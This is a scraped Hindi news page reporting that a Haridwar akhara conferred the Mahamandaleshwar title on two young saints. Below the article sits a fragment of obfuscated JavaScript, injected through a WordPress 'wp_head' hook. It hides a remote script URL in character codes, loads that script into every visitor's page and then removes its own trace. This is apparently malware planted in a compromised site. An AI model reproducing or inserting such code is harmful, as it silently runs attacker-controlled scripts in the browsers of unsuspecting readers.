Friday, July 19, 2024
Google search engine
Homeअन्यउत्तराखण्डः श्री पंचायती अखाड़ा महानिर्वाणी ने दो युवा संतों को बनाया महामंडलेश्वर!...

उत्तराखण्डः श्री पंचायती अखाड़ा महानिर्वाणी ने दो युवा संतों को बनाया महामंडलेश्वर! तिलक चादर के बाद प्रदान की पदवी

हरिद्वार। श्री पंचायती अखाड़ा महानिर्वाणी ने दो युवा संतों को महामंडलेश्वर की पदवी प्रदान की है। आज अखाड़ा परिषद अध्यक्ष एवं श्री पंचायती अखाड़ा महानिर्वाणी सचिव श्रीमहंत रविन्द्रपुरी के सानिध्य में रमता पंचों एवं संतों ने वृन्दावन के स्वामी सत्यानंद सरस्वती एवं अमृतसर के स्वामी मनकामेश्वर गिरि का तिलक चादर कर महामंडलेश्वर पदवी प्रदान की। बंगाली मोड़ स्थित अखाड़े की छावनी में आयोजित समारोह में श्रीमहंत रविंद्रपुरी ने कहा कि संत समाज में नए युग की शुरुआत हो रही है। अखाड़ों में युवा और पढ़े-लिखे साधु संत आ रहे हैं। दोनों महामंडलेश्वर शिक्षित और युवा हैं। दोनों युवा संत सनातन परंपरा की मर्यादा रखते हुए विश्व में धर्म का प्रचार करेंगे। श्रीमहंत रविन्द्रपुरी ने बताया कि धर्म के प्रचार के लिए अखाड़ों द्वारा संतों को महामंडलेश्वर का पद प्रदान किया जाता है। महंत जसविन्दर सिंह और महंत दामोदर दास ने कहा कि नवनियुक्त महामंडलेश्वर सनातन धर्म परंपरा के प्रचार प्रचार में योगदान करेंगे।

सम्बंधित खबरें
- Advertisment -spot_imgspot_img

ताजा खबरें

nt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>